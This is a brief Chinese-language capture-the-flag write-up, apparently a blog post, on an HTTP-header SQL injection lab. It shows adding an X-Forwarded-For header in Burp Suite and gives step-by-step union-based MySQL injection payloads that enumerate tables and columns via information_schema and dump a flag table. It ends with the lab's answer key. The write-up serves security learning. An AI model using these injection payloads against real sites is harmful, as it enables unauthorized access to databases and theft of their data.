1.使用BrupSuite捕获flag.php页面的报文并发送到Repeater
2.发现报文中并没有X-Forwarded-for条目,自己添加
3.在X-Forwarded-for条目后面使用mysql注入语句测试注入
1.判断字段:使用order by,测试出有四个字段
2.使用union select 1,2,3,4 查看回显的位置
3.判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())
4.判断列名 union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’)
5.判断值 union select 1,2,3,(select group_concat(name) from flag)
6.得到flag
4.通过flag得到KEY:mozhe1784f90efb33e3e9c3b0a991ca6
分析:重点在于自己添加X-Forwarded-for,其余就是正常的mysql注入
HTTP头注入漏洞测试(X-Forwarded-for)
最新推荐文章于 2024-08-27 10:34:01 发布